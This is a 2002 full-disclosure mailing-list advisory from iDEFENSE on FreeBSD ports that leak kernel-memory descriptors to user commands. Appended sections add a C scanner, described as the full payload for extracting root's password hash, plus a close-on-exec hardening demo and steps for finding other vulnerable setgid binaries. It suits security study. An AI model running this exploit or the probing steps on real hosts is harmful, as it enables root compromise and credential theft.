From dendler@idefense.com Mon Sep 16 15:37:06 2002
From: David Endler
To: full-disclosure@lists.netsys.com
Date: Mon, 16 Sep 2002 12:10:39 -0700
Subject: [Full-Disclosure] iDEFENSE Security Advisory 09.16.2002: FreeBSD Ports libkvm Security Vulnerabilities

iDEFENSE Security Advisory 09.16.2002
FreeBSD Ports libkvm Security Vulnerabilities

DESCRIPTION

The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be manipulated by a local user to take advantage of open file descriptors on /dev/mem and /dev/kmem and gain root privileges on the target host. All five programs are installed setgid kmem by default. They drop the kmem group privilege before executing user-specified commands, but the file descriptors they opened on /dev/mem and /dev/kmem stay open and are inherited by the command. Dropping the group ID does nothing about descriptors that were already opened with it, so any command the user names can read kernel and physical memory. This can lead to a local root compromise in various ways, for example by scanning kernel memory for the contents of the master password file (master.passwd).

ANALYSIS

The latest versions of all five ports mentioned above are vulnerable. The following examples illustrate the problem: in each case a user-specified command ("dummy") is started by the setgid program, and lsof shows that it inherited read descriptors on /dev/mem (device 2,0) and /dev/kmem (device 2,1).

bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ cat .wmmonrc
left "/home/dim/dummy"
bash-2.05a$ wmmon &
[1] 793
bash-2.05a$ Monitoring 5 devices for activity.
current stat is :1
bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem

Note that the descriptor numbers differ between programs: bubblemon and ascpu leave /dev/mem on descriptor 4 and /dev/kmem on descriptor 5, while wmmon and wmnet2 leave them on descriptors 3 and 4.

One possible exploit for these vulnerabilities is to replace getch() in strings(1) with:

    int getch()
    {
        char buf[4];

        /* one byte per call from inherited descriptor 4; stop at end of device */
        if (read(4, buf, 1) <= 0)
            return EOF;
        return (unsigned char)buf[0];
    }

or a similar, less CPU-expensive function that reads from the inherited memory descriptor (descriptor 4 is /dev/kmem under wmnet2 and /dev/mem under bubblemon and ascpu, per the lsof output above), and then execute:

wmnet2 -e exploit|grep root|grep Charlie

The two grep patterns pick root's entry out of a copy of master.passwd held in kernel memory; "Charlie &" is the default GECOS field of the root account on FreeBSD, so a line matching both "root" and "Charlie" is root's password entry, hash included.

DETECTION

The latest copies of asmon, ascpu, bubblemon, wmmon, and wmnet2 from the FreeBSD ports collection are vulnerable and were tested on FreeBSD 4.6-RELEASE. According to FreeBSD, any port that uses libkvm on releases up to and including 4.6.2-RELEASE may also be vulnerable.

WORKAROUND

Remove the setgid bit from the affected applications. This stops them from opening /dev/mem and /dev/kmem at all, at the cost of the functionality that depends on reading kernel memory:

chmod g-s /path.to/wmnet2

VENDOR RESPONSE

The FreeBSD advisory released in coordination with this advisory is FreeBSD-SA-02:39.libkvm. FreeBSD has provided the following patch details:

"Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27)."

DISCLOSURE TIMELINE

August 12, 2002 - Disclosed to iDEFENSE
September 6, 2002 - Disclosed to FreeBSD Security
September 6, 2002 - Disclosed to iDEFENSE clients
September 16, 2002 - Coordinated public disclosure by FreeBSD and iDEFENSE

CREDIT

This issue was exclusively disclosed to iDEFENSE by badc0ded@badc0ded.com
http://www.idefense.com/contributor.html

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@idefense.com
www.idefense.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
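The exploit sketched in the ANALYSIS section reads kernel memory one byte per read() through the patched getch(). The following is an added example, not code from the advisory or from the affected ports, of the "less CPU-expensive" variant the advisory alludes to: it reads the inherited descriptor in 64 KiB chunks, splits the data into printable runs the way strings(1) does, and returns the first run containing both needles ("root" and "Charlie" here, matching the grep pipeline above). Because it runs unprivileged, the input is a constructed file standing in for /dev/kmem, containing FreeBSD's shipped, locked root line rather than a real hash; the function and file names are the example's own.

```c
/* Added example: chunked scan of an inherited memory descriptor for the
 * root entry of master.passwd. Not part of the advisory or the ports. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CHUNK  65536   /* one read() per 64 KiB instead of per byte */
#define MAXRUN 512     /* longest printable run kept; a passwd line fits */

/* Scan fd for the first printable run (>= 4 bytes, like strings(1)) that
 * contains both needles. Copies it to out and returns 1, or 0 at end of
 * input. A read() failing with EFAULT or EIO (unmapped kernel address space
 * when the descriptor really is /dev/kmem) is skipped by seeking past the
 * chunk instead of aborting the scan. */
int scan_fd_for_run(int fd, const char *needle1, const char *needle2,
                    char *out, size_t outlen)
{
    char buf[CHUNK];
    char run[MAXRUN];
    size_t len = 0;
    ssize_t n;

    for (;;) {
        n = read(fd, buf, sizeof buf);
        if (n == 0)
            break;
        if (n < 0) {
            if ((errno == EFAULT || errno == EIO) &&
                lseek(fd, CHUNK, SEEK_CUR) != (off_t)-1)
                continue;
            break;
        }
        for (ssize_t i = 0; i < n; i++) {
            unsigned char c = (unsigned char)buf[i];
            if (isprint(c)) {
                if (len < MAXRUN - 1)
                    run[len++] = (char)c;
                continue;
            }
            /* a non-printable byte ends the current run, as in strings(1) */
            run[len] = '\0';
            if (len >= 4 && strstr(run, needle1) && strstr(run, needle2)) {
                snprintf(out, outlen, "%s", run);
                return 1;
            }
            len = 0;
        }
    }
    run[len] = '\0';   /* flush a run that ran up to end of input */
    if (len >= 4 && strstr(run, needle1) && strstr(run, needle2)) {
        snprintf(out, outlen, "%s", run);
        return 1;
    }
    return 0;
}

/* Constructed stand-in for kernel memory (assumption: binary noise around a
 * cached copy of master.passwd, using FreeBSD's default locked root line).
 * Returns a descriptor positioned at offset 0, or -1 on failure. */
int open_constructed_image(void)
{
    static const unsigned char image[] =
        "\x00\x01\x7f\xff" "kernel text, nothing useful" "\x00\x00"
        "root:*:0:0:Charlie &:/root:/bin/csh\n"
        "\x00\xde\xad" "toor:*:0:0:Bourne-again Superuser:/root:\n" "\x00";
    char path[] = "/tmp/kmem-image.XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);
    if (write(fd, image, sizeof image - 1) != (ssize_t)(sizeof image - 1) ||
        lseek(fd, 0, SEEK_SET) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    char line[MAXRUN];
    int fd = open_constructed_image();
    if (fd < 0)
        return 1;
    if (scan_fd_for_run(fd, "root", "Charlie", line, sizeof line))
        printf("found: %s\n", line);
    else
        printf("not found\n");
    close(fd);
    return 0;
}
```

Pointed at a real inherited descriptor instead of the constructed image, the scanner is the whole payload: the setgid program starts it, it reads from the descriptor number the lsof output shows for that program, and root's entry comes back as the matching run.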
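The DESCRIPTION and WORKAROUND sections describe a setgid program that drops its group ID and then execs a user command while the descriptors it opened with that group ID are still open. The following added example (not the ports' or FreeBSD's code) reproduces that pattern in a small fork/exec helper, probes from the child's side whether the privileged descriptor leaked through execve(), and shows the fix a program that cannot simply lose its setgid bit would apply: marking the descriptor close-on-exec (FD_CLOEXEC) before spawning. An unlinked temporary file stands in for the /dev/kmem descriptor so it runs as an unprivileged user; the function names are the example's own.

```c
/* Added example: descriptor leak across a privilege drop, the check for it,
 * and the close-on-exec fix. Not part of the advisory or the affected ports. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Mark fd close-on-exec so execve() drops it in the child. */
int mark_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* 1 if fd is open and would be inherited across execve(), else 0. */
int survives_exec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    return flags >= 0 && !(flags & FD_CLOEXEC);
}

/* Audit helper: number of descriptors in [3, maxfd) a child would inherit.
 * A setgid program should see 0 here right before it spawns a user command. */
int count_inheritable_fds(int maxfd)
{
    int n = 0;
    for (int fd = 3; fd < maxfd; fd++)
        n += survives_exec(fd);
    return n;
}

/* Run a user-supplied command the way the affected dock apps do: give up
 * the effective gid, then hand the string to sh. With hardened != 0,
 * priv_fd is marked close-on-exec first. Returns the child's exit status,
 * or -1 on failure. */
int run_user_command(const char *cmd, int priv_fd, int hardened)
{
    if (hardened && mark_cloexec(priv_fd) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Dropping the kmem gid is what the vulnerable ports do; it does
         * nothing about descriptors that were already opened with it. */
        if (setgid(getgid()) < 0)
            _exit(127);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Probe from the child's side: ": <&N" redirects the no-op builtin from
 * descriptor N, so exit status 0 means N leaked through execve() and a
 * nonzero status means the shell found it closed. */
int child_can_use_fd(int fd, int hardened)
{
    char cmd[32];
    snprintf(cmd, sizeof cmd, ": <&%d", fd);
    return run_user_command(cmd, fd, hardened) == 0;
}

/* Stand-in for the descriptor left open on /dev/kmem: an unlinked temporary
 * file, moved to a number >= 3 so it cannot be mistaken for stdio. */
int open_stand_in(void)
{
    char path[] = "/tmp/kmem-stand-in.XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);
    if (fd < 3) {
        int hi = fcntl(fd, F_DUPFD, 3);
        close(fd);
        fd = hi;
    }
    return fd;
}

int main(void)
{
    int fd = open_stand_in();
    if (fd < 0)
        return 1;
    printf("inheritable fds before spawning: %d\n", count_inheritable_fds(64));
    printf("child can use fd %d, vulnerable: %d\n", fd, child_can_use_fd(fd, 0));
    printf("child can use fd %d, hardened:   %d\n", fd, child_can_use_fd(fd, 1));
    printf("inheritable fds after hardening: %d\n", count_inheritable_fds(64));
    close(fd);
    return 0;
}
```

The same probe works against a real setgid binary without lsof: hand it a command of the form sh -c ': <&4' (using the descriptor number the lsof listings above show for that program) and a zero exit status means the descriptor is reachable from the user command. To find other candidates on a host, look for setgid files owned by group kmem (find with -group kmem and -perm -2000) and test each one the same way.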